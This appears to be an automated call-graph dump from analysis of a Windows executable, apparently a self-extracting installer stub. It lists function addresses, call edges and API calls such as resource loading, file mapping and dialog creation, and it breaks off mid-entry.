7ff6c03717f0 27231->27265 27232->27168 27233->27171 27234->27183 27235->27186 27236->27171 27238 7ff6c0371fd6 std::bad_alloc::bad_alloc 27237->27238 27241 7ff6c0371f45 std::bad_alloc::bad_alloc 27237->27241 27305 7ff6c0383ff8 27238->27305 27239 7ff6c0356b59 27239->27213 27239->27214 27239->27215 27241->27239 27242 7ff6c0383ff8 Concurrency::cancel_current_task 2 API calls 27241->27242 27243 7ff6c0371f8f std::bad_alloc::bad_alloc 27241->27243 27242->27243 27243->27239 27244 7ff6c0383ff8 Concurrency::cancel_current_task 2 API calls 27243->27244 27245 7ff6c0372029 27244->27245 27247 7ff6c0364740 27246->27247 27249 7ff6c036474a 27246->27249 27248 7ff6c0382150 33 API calls 27247->27248 27248->27249 27249->27222 27251 7ff6c0361776 __scrt_get_show_window_mode 27250->27251 27310 7ff6c0368a08 27251->27310 27253 7ff6c036180e 27253->27227 27254 7ff6c03617aa 27256 7ff6c0368a08 146 API calls 27254->27256 27257 7ff6c03617e8 27254->27257 27320 7ff6c0368c0c 27254->27320 27256->27254 27257->27253 27258 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27257->27258 27259 7ff6c036183a 27258->27259 27266 7ff6c037180e 27265->27266 27268 7ff6c0371821 27266->27268 27335 7ff6c036e8c4 27266->27335 27272 7ff6c0371858 27268->27272 27326 7ff6c03822ec 27268->27326 27270 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27271 7ff6c0371a50 27270->27271 27274 7ff6c03719b7 27272->27274 27330 7ff6c036a944 27272->27330 27274->27270 27275->27207 27276->27231 27278 7ff6c03540dd 27277->27278 27280 7ff6c03540d7 __scrt_get_show_window_mode 27277->27280 27278->27280 27342 7ff6c0354120 33 API calls 2 library calls 27278->27342 27280->27213 27281->27216 27283 7ff6c0371ea9 27282->27283 27284 7ff6c0371edd 27283->27284 27285 7ff6c0371ed5 27283->27285 27286 7ff6c0371ec9 27283->27286 27284->27227 27364 7ff6c03738e4 151 API calls 27285->27364 27343 7ff6c037202c 27286->27343 27289 7ff6c03746b3 memcpy_s 27289->27289 27290 7ff6c0368a08 146 API calls 27289->27290 27291 7ff6c0374a57 27289->27291 27347 7ff6c036e958 27289->27347 27365 7ff6c0372a30 146 API calls 27289->27365 27366 7ff6c0374b18 146 API calls 27289->27366 27367 7ff6c036ec58 27289->27367 27371 7ff6c0372320 113 API calls 27289->27371 27372 7ff6c0375370 151 API calls 27289->27372 27290->27289 27353 7ff6c0373404 27291->27353 27302->27229 27303->27231 27304->27207 27306 7ff6c0384017 27305->27306 27307 7ff6c0384034 RtlPcToFileHeader 27305->27307 27306->27307 27308 7ff6c038404c 27307->27308 27309 7ff6c038405b RaiseException 27307->27309 27308->27309 27309->27241 27312 7ff6c0368a51 memcpy_s 27310->27312 27313 7ff6c0368b8d 27310->27313 27311 7ff6c0368bda 27314 7ff6c036e784 SetThreadExecutionState RtlPcToFileHeader RaiseException 27311->27314 27312->27313 27316 7ff6c03760ac 137 API calls 27312->27316 27317 7ff6c0368bdf 27312->27317 27318 7ff6c0364848 108 API calls 27312->27318 27319 7ff6c0362890 104 API calls 27312->27319 27313->27311 27315 7ff6c035a174 8 API calls 27313->27315 27314->27317 27315->27311 27316->27312 27317->27254 27318->27312 27319->27312 27321 7ff6c0368c4b 27320->27321 27322 7ff6c0368c32 memcpy_s 27320->27322 27321->27322 27323 7ff6c0362ca0 104 API calls 27321->27323 27324 7ff6c0368c79 27322->27324 27325 7ff6c0364848 108 API calls 27322->27325 27323->27322 27325->27324 27327 7ff6c038231f 27326->27327 27328 7ff6c0382348 27327->27328 27329 7ff6c03717f0 108 API calls 27327->27329 27328->27272 27329->27327 27331 7ff6c036a955 27330->27331 27332 7ff6c036a99d 27330->27332 27331->27332 27333 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27331->27333 27332->27274 27334 7ff6c036a9be 27333->27334 27336 7ff6c036ec58 103 API calls 27335->27336 27337 7ff6c036e8db ReleaseSemaphore 27336->27337 27338 7ff6c036e900 27337->27338 27339 7ff6c036e91f DeleteCriticalSection CloseHandle CloseHandle 27337->27339 27340 7ff6c036e9d8 101 API calls 27338->27340 27341 7ff6c036e90a CloseHandle 27340->27341 27341->27338 27341->27339 27345 7ff6c0372048 __scrt_get_show_window_mode 27343->27345 27344 7ff6c037213a 27344->27289 27345->27344 27346 7ff6c035b76c 82 API calls 27345->27346 27346->27345 27348 7ff6c036e979 27347->27348 27349 7ff6c036e97e 27347->27349 27350 7ff6c036ea20 101 API calls 27348->27350 27351 7ff6c036e98f 27349->27351 27352 7ff6c036ec58 103 API calls 27349->27352 27350->27349 27351->27289 27352->27351 27361 7ff6c0373486 memcpy_s 27353->27361 27364->27284 27365->27289 27366->27289 27368 7ff6c036ec6a ResetEvent ReleaseSemaphore 27367->27368 27369 7ff6c036ec99 27367->27369 27370 7ff6c036e9d8 101 API calls 27368->27370 27369->27289 27370->27369 27371->27289 27372->27289 27374 7ff6c0368842 27373->27374 27375 7ff6c0368852 27373->27375 27380 7ff6c03623b0 27374->27380 27375->26830 27378 7ff6c03822a0 _handle_error 8 API calls 27377->27378 27379 7ff6c035f7ec 27378->27379 27379->26718 27379->26833 27381 7ff6c03623cf 27380->27381 27384 7ff6c0362a60 101 API calls 27381->27384 27382 7ff6c03623e8 27385 7ff6c0362b70 101 API calls 27382->27385 27383 7ff6c03623f8 27383->27375 27384->27382 27385->27383 27386->26844 27388 7ff6c0355e6f 27387->27388 27451 7ff6c03685b0 27388->27451 27390 7ff6c0356134 27461 7ff6c0356fcc 82 API calls 27390->27461 27392 7ff6c035613c 27393 7ff6c03569af 27392->27393 27397 7ff6c03569e4 27392->27397 27405 7ff6c03569ef 27392->27405 27394 7ff6c03822a0 _handle_error 8 API calls 27393->27394 27396 7ff6c03569c3 27394->27396 27395 7ff6c0356973 27474 7ff6c035466c 82 API calls 27395->27474 27396->26857 27399 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27397->27399 27398 7ff6c035612e 27398->27390 27398->27395 27402 7ff6c03685b0 104 API calls 27398->27402 27401 7ff6c03569e9 27399->27401 27403 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27401->27403 27404 7ff6c03561a4 27402->27404 27403->27405 27404->27390 27408 7ff6c03561ac 27404->27408 27406 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27405->27406 27407 7ff6c03569f5 27406->27407 27410 7ff6c035623f 27408->27410 27462 7ff6c035466c 82 API calls 27408->27462 27410->27395 27411 7ff6c0356266 27410->27411 27414 7ff6c03568b7 27411->27414 27415 7ff6c03562ce 27411->27415 27417 7ff6c0364cc4 31 API calls 27414->27417 27416 7ff6c0356481 27415->27416 27419 7ff6c03562e0 27415->27419 27466 7ff6c0364c34 33 API calls 27416->27466 27423 7ff6c03568c6 27417->27423 27419->27392 27420 7ff6c0354228 33 API calls 27419->27420 27433 7ff6c035638f 27419->27433 27423->27392 27427 7ff6c0354228 33 API calls 27427->27433 27430 7ff6c0353c84 47 API calls 27430->27433 27432 7ff6c0351fa0 31 API calls 27432->27433 27433->27427 27433->27430 27433->27432 27434 7ff6c0356402 27433->27434 27464 7ff6c035701c 82 API calls 27433->27464 27434->27392 27437 7ff6c035649e 27449->26857 27452 7ff6c036865a 27451->27452 27453 7ff6c03685d4 27451->27453 27454 7ff6c036863c 27452->27454 27456 7ff6c03540b0 33 API calls 27452->27456 27453->27454 27455 7ff6c03540b0 33 API calls 27453->27455 27454->27398 27457 7ff6c036860d 27455->27457 27458 7ff6c0368673 27456->27458 27475 7ff6c035a174 27457->27475 27460 7ff6c0362890 104 API calls 27458->27460 27460->27454 27461->27392 27466->27437 27476 7ff6c035a185 27475->27476 27477 7ff6c035a19a 27476->27477 27479 7ff6c036aed4 8 API calls 2 library calls 27476->27479 27477->27454 27479->27477 27485 7ff6c0359be7 27480->27485 27481 7ff6c0359c1b 27482 7ff6c03822a0 _handle_error 8 API calls 27481->27482 27483 7ff6c0359c9d 27482->27483 27483->26873 27485->27481 27486 7ff6c0359c83 27485->27486 27489 7ff6c0359cae 27485->27489 27615 7ff6c0365254 34 API calls 3 library calls 27485->27615 27616 7ff6c036dadc 33 API calls 27485->27616 27487 7ff6c0351fa0 31 API calls 27486->27487 27487->27481 27490 7ff6c0359cbf 27489->27490 27617 7ff6c036d9c4 CompareStringW 27489->27617 27490->27486 27492 7ff6c03520b0 33 API calls 27490->27492 27492->27486 27506 7ff6c0365efa 27493->27506 27494 7ff6c036615b 27496 7ff6c03822a0 _handle_error 8 API calls 27494->27496 27495 7ff6c036618e 27618 7ff6c035704c 47 API calls memcpy_s 27495->27618 27498 7ff6c035fb39 27496->27498 27498->26876 27566 7ff6c0367c54 47 API calls 2 library calls 27498->27566 27499 7ff6c0366194 27500 7ff6c035129c 33 API calls 27501 7ff6c03660e9 27500->27501 27502 7ff6c0351fa0 31 API calls 27501->27502 27503 7ff6c03660fb memcpy_s 27501->27503 27502->27503 27503->27494 27504 7ff6c0366189 27503->27504 27505 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27504->27505 27505->27495 27506->27494 27506->27495 27506->27500 27565->26867 27566->26878 27567->26876 27613->26919 27614->26919 27615->27485 27616->27485 27617->27490 27618->27499 27692->27042 27693->27046 27695 7ff6c036879f 27694->27695 27696 7ff6c036876f 27694->27696 27700 7ff6c03822ec 108 API calls 27695->27700 27706 7ff6c03687eb 27695->27706 27697 7ff6c03822ec 108 API calls 27696->27697 27699 7ff6c036878a 27697->27699 27702 7ff6c03822ec 108 API calls 27699->27702 27703 7ff6c03687d4 27700->27703 27701 7ff6c0368805 27705 7ff6c03645dc 108 API calls 27701->27705 27702->27695 27704 7ff6c03822ec 108 API calls 27703->27704 27704->27706 27707 7ff6c0368811 27705->27707 27709 7ff6c03645dc 27706->27709 27708->27038 27710 7ff6c03645f2 27709->27710 27712 7ff6c03645fa 27709->27712 27711 7ff6c036e8c4 108 API calls 27710->27711 27711->27712 27712->27701 27714 7ff6c037844c 4 API calls 27713->27714 27715 7ff6c037842a 27714->27715 27717 7ff6c0378439 27715->27717 27725 7ff6c0378484 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27715->27725 27717->26050 27717->26051 27718->26052 27719->26062 27721 7ff6c0378463 27720->27721 27722 7ff6c037845e 27720->27722 27721->26062 27726 7ff6c0378510 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27722->27726 27724->26065 27725->27717 27726->27721 27727->26085 27729->26115 27730->26131 27731->26138 27733->26143 25347 7ff6c03814cb 25348 7ff6c0381422 25347->25348 25351 7ff6c0381880 25348->25351 25377 7ff6c03814d8 25351->25377 25354 7ff6c038190b 25355 7ff6c03817e8 DloadReleaseSectionWriteAccess 6 API calls 25354->25355 25356 7ff6c0381918 RaiseException 25355->25356 25370 7ff6c0381461 25356->25370 25357 7ff6c0381934 25358 7ff6c03819bd LoadLibraryExA 25357->25358 25359 7ff6c0381a29 25357->25359 25363 7ff6c0381a3d 25357->25363 25364 7ff6c0381b05 25357->25364 25358->25359 25360 7ff6c03819d4 GetLastError 25358->25360 25361 7ff6c0381a34 FreeLibrary 25359->25361 25359->25363 25365 7ff6c03819e9 25360->25365 25366 7ff6c03819fe 25360->25366 25361->25363 25362 7ff6c0381a9b GetProcAddress 25362->25364 25369 7ff6c0381ab0 GetLastError 25362->25369 25363->25362 25363->25364 25385 7ff6c03817e8 25364->25385 25365->25359 25365->25366 25368 7ff6c03817e8 DloadReleaseSectionWriteAccess 6 API calls 25366->25368 25371 7ff6c0381a0b RaiseException 25368->25371 25372 7ff6c0381ac5 25369->25372 25371->25370 25372->25364 25373 7ff6c03817e8 DloadReleaseSectionWriteAccess 6 API calls 25372->25373 25374 7ff6c0381ae7 RaiseException 25373->25374 25375 7ff6c03814d8 _com_raise_error 6 API calls 25374->25375 25376 7ff6c0381b01 25375->25376 25376->25364 25378 7ff6c0381553 25377->25378 25379 7ff6c03814ee 25377->25379 25378->25354 25378->25357 25393 7ff6c0381584 25379->25393 25382 7ff6c038154e 25384 7ff6c0381584 DloadReleaseSectionWriteAccess 3 API calls 25382->25384 25384->25378 25386 7ff6c03817f8 25385->25386 25387 7ff6c0381851 25385->25387 25388 7ff6c0381584 DloadReleaseSectionWriteAccess 3 API calls 25386->25388 25387->25370 25389 7ff6c03817fd 25388->25389 25390 7ff6c038184c 25389->25390 25392 7ff6c0381758 DloadProtectSection 3 API calls 25389->25392 25391 7ff6c0381584 DloadReleaseSectionWriteAccess 3 API calls 25390->25391 25391->25387 25392->25390 25394 7ff6c038159f 25393->25394 25395 7ff6c03814f3 25393->25395 25394->25395 25396 7ff6c03815a4 GetModuleHandleW 25394->25396 25395->25382 25400 7ff6c0381758 25395->25400 25397 7ff6c03815b9 25396->25397 25398 7ff6c03815be GetProcAddress 25396->25398 25397->25395 25398->25397 25399 7ff6c03815d3 GetProcAddress 25398->25399 25399->25397 25401 7ff6c038177a DloadProtectSection 25400->25401 25402 7ff6c03817ba VirtualProtect 25401->25402 25403 7ff6c0381782 25401->25403 25405 7ff6c0381624 VirtualQuery GetSystemInfo 25401->25405 25402->25403 25403->25382 25405->25402 27738 7ff6c038d8cc 27739 7ff6c038d917 27738->27739 27743 7ff6c038d8db abort 27738->27743 27745 7ff6c038d61c 15 API calls abort 27739->27745 27741 7ff6c038d8fe HeapAlloc 27742 7ff6c038d915 27741->27742 27741->27743 27743->27739 27743->27741 27744 7ff6c038bb40 abort 2 API calls 27743->27744 27744->27743 27745->27742 27778 7ff6c0382cec 27803 7ff6c038277c 27778->27803 27781 7ff6c0382e38 27901 7ff6c03830f0 7 API calls 2 library calls 27781->27901 27783 7ff6c0382e42 27902 7ff6c03830f0 7 API calls 2 library calls 27783->27902 27784 7ff6c0382d08 __scrt_acquire_startup_lock 27784->27783 27786 7ff6c0382d26 27784->27786 27787 7ff6c0382d4b 27786->27787 27792 7ff6c0382d68 __scrt_release_startup_lock 27786->27792 27811 7ff6c038cd10 27786->27811 27788 7ff6c0382e4d abort 27790 7ff6c0382dd1 27815 7ff6c038323c 27790->27815 27792->27790 27898 7ff6c038bfd0 35 API calls __GSHandlerCheck_EH 27792->27898 27793 7ff6c0382dd6 27818 7ff6c038cca0 27793->27818 27903 7ff6c0382f30 27803->27903 27806 7ff6c03827ab 27905 7ff6c038cbd0 27806->27905 27807 7ff6c03827a7 27807->27781 27807->27784 27812 7ff6c038cd6b 27811->27812 27813 7ff6c038cd4c 27811->27813 27812->27792 27813->27812 27922 7ff6c0351120 27813->27922 27816 7ff6c0383c70 __scrt_get_show_window_mode 27815->27816 27817 7ff6c0383253 GetStartupInfoW 27816->27817 27817->27793 27928 7ff6c03906b0 27818->27928 27820 7ff6c038ccaf 27821 7ff6c0382dde 27820->27821 27932 7ff6c0390a40 35 API calls swprintf 27820->27932 27823 7ff6c03806d4 27821->27823 27934 7ff6c036df4c 27823->27934 27826 7ff6c036629c 35 API calls 27827 7ff6c038071a 27826->27827 28011 7ff6c03793ec 27827->28011 27829 7ff6c0380724 __scrt_get_show_window_mode 28016 7ff6c0379994 27829->28016 27831 7ff6c0380799 27832 7ff6c03808ee GetCommandLineW 27831->27832 27880 7ff6c0380d5c 27831->27880 27835 7ff6c0380900 27832->27835 27873 7ff6c0380ac2 27832->27873 27833 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27834 7ff6c0380d62 27833->27834 27838 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27834->27838 27839 7ff6c035129c 33 API calls 27835->27839 27836 7ff6c0366414 34 API calls 27837 7ff6c0380ad1 27836->27837 27840 7ff6c0351fa0 31 API calls 27837->27840 27844 7ff6c0380ae8 memcpy_s 27837->27844 27849 7ff6c0380d68 27838->27849 27842 7ff6c0380925 27839->27842 27840->27844 27841 7ff6c0351fa0 31 API calls 27845 7ff6c0380b13 SetEnvironmentVariableW GetLocalTime 27841->27845 28026 7ff6c037ca50 27842->28026 27844->27841 27848 7ff6c0363de8 swprintf 46 API calls 27845->27848 27846 7ff6c0381880 _com_raise_error 14 API calls 27846->27849 27847 7ff6c038092f 27847->27834 27851 7ff6c0380a5b 27847->27851 27852 7ff6c0380979 OpenFileMappingW 27847->27852 27850 7ff6c0380b98 SetEnvironmentVariableW GetModuleHandleW LoadIconW 27848->27850 27849->27846 28057 7ff6c037af94 LoadBitmapW 27850->28057 27860 7ff6c035129c 33 API calls 27851->27860 27854 7ff6c0380999 MapViewOfFile 27852->27854 27855 7ff6c0380a50 CloseHandle 27852->27855 27854->27855 27858 7ff6c03809bf UnmapViewOfFile MapViewOfFile 27854->27858 27855->27873 27858->27855 27861 7ff6c03809f1 27858->27861 27859 7ff6c0380bf5 28081 7ff6c0376734 27859->28081 27863 7ff6c0380a80 27860->27863 28088 7ff6c037a110 33 API calls 2 library calls 27861->28088 28044 7ff6c037fc8c 27863->28044 27867 7ff6c0380a01 27870 7ff6c037fc8c 35 API calls 27867->27870 27868 7ff6c0376734 33 API calls 27871 7ff6c0380c07 DialogBoxParamW 27868->27871 27872 7ff6c0380a10 27870->27872 27881 7ff6c0380c53 27871->27881 28089 7ff6c036b970 102 API calls 27872->28089 27873->27836 27875 7ff6c0380a25 27877 7ff6c036babc 102 API calls 27875->27877 27876 7ff6c0380d57 27878 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27876->27878 27879 7ff6c0380a38 27877->27879 27878->27880 27884 7ff6c0380a47 UnmapViewOfFile 27879->27884 27880->27833 27882 7ff6c0380c6c 27881->27882 27883 7ff6c0380c66 Sleep 27881->27883 27885 7ff6c0380c7a 27882->27885 28090 7ff6c0379ecc 49 API calls 2 library calls 27882->28090 27883->27882 27884->27855 27887 7ff6c0380c86 DeleteObject 27885->27887 27888 7ff6c0380ca5 27887->27888 27889 7ff6c0380c9f DeleteObject 27887->27889 27890 7ff6c0380ced 27888->27890 27891 7ff6c0380cdb 27888->27891 27889->27888 28084 7ff6c0379464 27890->28084 28091 7ff6c037fda4 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27891->28091 27894 7ff6c0380ce0 CloseHandle 27894->27890 27898->27790 27901->27783 27902->27788 27904 7ff6c038279e __scrt_dllmain_crt_thread_attach 27903->27904 27904->27806 27904->27807 27907 7ff6c0390ccc 27905->27907 27906 7ff6c03827b0 27906->27807 27909 7ff6c0385120 7 API calls 2 library calls 27906->27909 27907->27906 27910 7ff6c038eb80 27907->27910 27909->27807 27921 7ff6c038f318 EnterCriticalSection 27910->27921 27923 7ff6c03591c8 35 API calls 27922->27923 27924 7ff6c0351130 27923->27924 27927 7ff6c038293c 34 API calls 27924->27927 27926 7ff6c0382981 27926->27813 27927->27926 27929 7ff6c03906c9 27928->27929 27930 7ff6c03906bd 27928->27930 27929->27820 27933 7ff6c03904f0 48 API calls 4 library calls 27930->27933 27932->27820 27933->27929 28092 7ff6c03823d0 27934->28092 27937 7ff6c036dff7 27939 7ff6c036e47f 27937->27939 28099 7ff6c038b708 39 API calls 2 library calls 27937->28099 27938 7ff6c036dfa2 GetProcAddress 27940 7ff6c036dfb7 27938->27940 27941 7ff6c036dfcf GetProcAddress 27938->27941 27944 7ff6c0366414 34 API calls 27939->27944 27940->27941 27941->27937 27942 7ff6c036dfe4 27941->27942 27942->27937 27946 7ff6c036e488 27944->27946 27945 7ff6c036e32c 27945->27939 27948 7ff6c036e336 27945->27948 27947 7ff6c0367db4 47 API calls 27946->27947 27954 7ff6c036e496 27947->27954 27949 7ff6c0366414 34 API calls 27948->27949 27950 7ff6c036e33f CreateFileW 27949->27950 27952 7ff6c036e46c CloseHandle 27950->27952 27953 7ff6c036e37f SetFilePointer 27950->27953 27956 7ff6c0351fa0 31 API calls 27952->27956 27953->27952 27955 7ff6c036e398 ReadFile 27953->27955 27961 7ff6c036e4ba CompareStringW 27954->27961 27962 7ff6c035129c 33 API calls 27954->27962 27965 7ff6c0368050 47 API calls 27954->27965 27966 7ff6c0351fa0 31 API calls 27954->27966 27972 7ff6c036327c 51 API calls 27954->27972 27996 7ff6c036e548 27954->27996 28094 7ff6c0365164 27954->28094 27955->27952 27957 7ff6c036e3c0 27955->27957 27956->27939 27958 7ff6c036e77c 27957->27958 27963 7ff6c036e3d4 27957->27963 28108 7ff6c03825a4 8 API calls 27958->28108 27960 7ff6c036e781 27961->27954 27962->27954 27964 7ff6c035129c 33 API calls 27963->27964 27969 7ff6c036e40b 27964->27969 27965->27954 27966->27954 27968 7ff6c036e5b6 27970 7ff6c036e5c4 27968->27970 27971 7ff6c036e73e 27968->27971 27973 7ff6c036e457 27969->27973 28100 7ff6c036d05c 27969->28100 28104 7ff6c0367e70 47 API calls 27970->28104 27975 7ff6c0351fa0 31 API calls 27971->27975 27972->27954 27976 7ff6c0351fa0 31 API calls 27973->27976 27978 7ff6c036e747 27975->27978 27979 7ff6c036e461 27976->27979 27977 7ff6c036e5cd 27980 7ff6c0365164 9 API calls 27977->27980 27982 7ff6c0351fa0 31 API calls 27978->27982 27983 7ff6c0351fa0 31 API calls 27979->27983 27984 7ff6c036e5d2 27980->27984 27981 7ff6c035129c 33 API calls 27981->27996 27985 7ff6c036e751 27982->27985 27983->27952 27987 7ff6c036e682 27984->27987 27993 7ff6c036e5dd 27984->27993 27986 7ff6c03822a0 _handle_error 8 API calls 27985->27986 27990 7ff6c036e760 27986->27990 27989 7ff6c036da14 48 API calls 27987->27989 27988 7ff6c0368050 47 API calls 27988->27996 27991 7ff6c036e6c7 AllocConsole 27989->27991 27990->27826 27994 7ff6c036e677 27991->27994 27995 7ff6c036e6d1 GetCurrentProcessId AttachConsole 27991->27995 27992 7ff6c0351fa0 31 API calls 27992->27996 27999 7ff6c036aaa0 48 API calls 27993->27999 28107 7ff6c03519e0 31 API calls _invalid_parameter_noinfo_noreturn 27994->28107 27997 7ff6c036e6e8 27995->27997 27996->27968 27996->27981 27996->27988 27996->27992 27998 7ff6c036327c 51 API calls 27996->27998 28004 7ff6c036e6f4 GetStdHandle WriteConsoleW Sleep FreeConsole 27997->28004 27998->27996 28001 7ff6c036e621 27999->28001 28003 7ff6c036da14 48 API calls 28001->28003 28002 7ff6c036e735 ExitProcess 28005 7ff6c036e63f 28003->28005 28004->27994 28006 7ff6c036aaa0 48 API calls 28005->28006 28007 7ff6c036e64a 28006->28007 28105 7ff6c036dba8 33 API calls 28007->28105 28009 7ff6c036e656 28106 7ff6c03519e0 31 API calls _invalid_parameter_noinfo_noreturn 28009->28106 28012 7ff6c036dd04 28011->28012 28013 7ff6c0379401 OleInitialize 28012->28013 28014 7ff6c0379427 28013->28014 28015 7ff6c037944d SHGetMalloc 28014->28015 28015->27829 28017 7ff6c03799c9 28016->28017 28019 7ff6c03799ce memcpy_s 28016->28019 28018 7ff6c0351fa0 31 API calls 28017->28018 28018->28019 28020 7ff6c0351fa0 31 API calls 28019->28020 28021 7ff6c03799fd memcpy_s 28019->28021 28020->28021 28022 7ff6c0351fa0 31 API calls 28021->28022 28023 7ff6c0379a2c memcpy_s 28021->28023 28022->28023 28024 7ff6c0351fa0 31 API calls 28023->28024 28025 7ff6c0379a5b memcpy_s 28023->28025 28024->28025 28025->27831 28027 7ff6c036d05c 33 API calls 28026->28027 28042 7ff6c037ca9f memcpy_s 28027->28042 28028 7ff6c037cd0b 28029 7ff6c037cd3e 28028->28029 28032 7ff6c037cd64 28028->28032 28030 7ff6c03822a0 _handle_error 8 API calls 28029->28030 28033 7ff6c037cd4f 28030->28033 28031 7ff6c036d05c 33 API calls 28031->28042 28034 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 28032->28034 28033->27847 28035 7ff6c037cd69 28034->28035 28109 7ff6c035704c 47 API calls memcpy_s 28035->28109 28036 7ff6c037cd6f 28110 7ff6c035704c 47 API calls memcpy_s 28036->28110 28039 7ff6c035129c 33 API calls 28039->28042 28040 7ff6c037cd75 28041 7ff6c036babc 102 API calls 28041->28042 28042->28028 28042->28031 28042->28032 28042->28035 28042->28036 28042->28039 28042->28041 28043 7ff6c0351fa0 31 API calls 28042->28043 28043->28042 28045 7ff6c037fcbc SetEnvironmentVariableW 28044->28045 28046 7ff6c037fcb9 28044->28046 28047 7ff6c036d05c 33 API calls 28045->28047 28046->28045 28054 7ff6c037fcf4 28047->28054 28048 7ff6c037fd43 28049 7ff6c037fd7a 28048->28049 28051 7ff6c037fd9b 28048->28051 28050 7ff6c03822a0 _handle_error 8 API calls 28049->28050 28052 7ff6c037fd8b 28050->28052 28053 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 28051->28053 28052->27873 28052->27876 28055 7ff6c037fda0 28053->28055 28054->28048 28056 7ff6c037fd2d SetEnvironmentVariableW 28054->28056 28056->28048 28058 7ff6c037afc6 28057->28058 28059 7ff6c037afbe 28057->28059 28061 7ff6c037afe3 28058->28061 28062 7ff6c037afce GetObjectW 28058->28062 28111 7ff6c03785a4 FindResourceExW 28059->28111 28063 7ff6c037841c 4 API calls 28061->28063 28062->28061 28064 7ff6c037aff8 28063->28064 28065 7ff6c037b04e 28064->28065 28066 7ff6c037b01e 28064->28066 28067 7ff6c03785a4 11 API calls 28064->28067 28076 7ff6c036986c 28065->28076 28126 7ff6c0378484 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28066->28126 28069 7ff6c037b00a 28067->28069 28069->28066 28071 7ff6c037b012 DeleteObject 28069->28071 28070 7ff6c037b027 28072 7ff6c037844c 4 API calls 28070->28072 28071->28066 28073 7ff6c037b032 28072->28073 28127 7ff6c0378d74 16 API calls _handle_error 28073->28127 28075 7ff6c037b03f DeleteObject 28075->28065 28128 7ff6c036989c 28076->28128 28078 7ff6c036987a 28195 7ff6c036a3fc GetModuleHandleW FindResourceW 28078->28195 28080 7ff6c0369882 28080->27859 28082 7ff6c0382150 33 API calls 28081->28082 28083 7ff6c037677a 28082->28083 28083->27868 28085 7ff6c0379481 28084->28085 28086 7ff6c037948a OleUninitialize 28085->28086 28087 7ff6c03be330 28086->28087 28088->27867 28089->27875 28090->27885 28091->27894 28093 7ff6c036df70 GetModuleHandleW 28092->28093 28093->27937 28093->27938 28095 7ff6c0365188 GetVersionExW 28094->28095 28096 7ff6c03651bb 28094->28096 28095->28096 28097 7ff6c03822a0 _handle_error 8 API calls 28096->28097 28098 7ff6c03651e8 28097->28098 28098->27954 28099->27945 28102 7ff6c036d08e 28100->28102 28101 7ff6c036d0c2 28101->27969 28102->28101 28103 7ff6c0351744 33 API calls 28102->28103 28103->28102 28104->27977 28105->28009 28106->27994 28107->28002 28108->27960 28109->28036 28110->28040 28112 7ff6c03785cf SizeofResource 28111->28112 28116 7ff6c037871b 28111->28116 28113 7ff6c03785e9 LoadResource 28112->28113 28112->28116 28114 7ff6c0378602 LockResource 28113->28114 28113->28116 28115 7ff6c0378617 GlobalAlloc 28114->28115 28114->28116 28115->28116 28117 7ff6c0378638 GlobalLock 28115->28117 28116->28058 28118 7ff6c037864a memcpy_s 28117->28118 28119 7ff6c0378712 GlobalFree 28117->28119 28120 7ff6c0378658 CreateStreamOnHGlobal 28118->28120 28119->28116 28121 7ff6c0378709 GlobalUnlock 28120->28121 28122 7ff6c0378676 GdipAlloc 28120->28122 28121->28119 28123 7ff6c037868b 28122->28123 28123->28121 28124 7ff6c03786da GdipCreateHBITMAPFromBitmap 28123->28124 28125 7ff6c03786f2 28123->28125 28124->28125 28125->28121 28126->28070 28127->28075 28131 7ff6c03698be _snwprintf 28128->28131 28129 7ff6c0369933 28205 7ff6c0366870 48 API calls 28129->28205 28131->28129 28133 7ff6c0369a49 28131->28133 28132 7ff6c0351fa0 31 API calls 28135 7ff6c03699bd 28132->28135 28133->28135 28138 7ff6c03520b0 33 API calls 28133->28138 28134 7ff6c036993d memcpy_s 28134->28132 28136 7ff6c036a3ee 28134->28136 28140 7ff6c0362480 54 API calls 28135->28140 28137 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 28136->28137 28139 7ff6c036a3f4 28137->28139 28138->28135 28142 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 28139->28142 28141 7ff6c03699da 28140->28141 28143 7ff6c03699e2 28141->28143 28149 7ff6c0369a6d 28141->28149 28146 7ff6c036a3fa 28142->28146 28145 7ff6c0362004 100 API calls 28143->28145 28144 7ff6c0369ad7 28197 7ff6c038a3d0 28144->28197 28147 7ff6c03699eb 28145->28147 28147->28139 28150 7ff6c0369a26 28147->28150 28149->28144 28151 7ff6c0368e18 33 API calls 28149->28151 28154 7ff6c03822a0 _handle_error 8 API calls 28150->28154 28151->28149 28153 7ff6c038a3d0 31 API calls 28166 7ff6c0369b17 __vcrt_FlsAlloc 28153->28166 28155 7ff6c036a3ce 28154->28155 28155->28078 28156 7ff6c0369c49 28158 7ff6c0362a60 101 API calls 28156->28158 28169 7ff6c0369d1c 28156->28169 28157 7ff6c0362b70 101 API calls 28157->28166 28160 7ff6c0369c61 28158->28160 28159 7ff6c0362890 104 API calls 28159->28166 28161 7ff6c0362890 104 API calls 28160->28161 28160->28169 28167 7ff6c0369c89 28161->28167 28162 7ff6c0362004 100 API calls 28164 7ff6c036a3b5 28162->28164 28163 7ff6c0362a60 101 API calls 28163->28166 28165 7ff6c0351fa0 31 API calls 28164->28165 28165->28150 28166->28156 28166->28157 28166->28159 28166->28163 28166->28169 28167->28169 28192 7ff6c0369c97 __vcrt_FlsAlloc 28167->28192 28206 7ff6c0370b3c MultiByteToWideChar 28167->28206 28169->28162 28170 7ff6c036a1ac 28180 7ff6c036a282 28170->28180 28212 7ff6c038cf10 31 API calls 2 library calls 28170->28212 28172 7ff6c036a117 28172->28170 28209 7ff6c038cf10 31 API calls 2 library 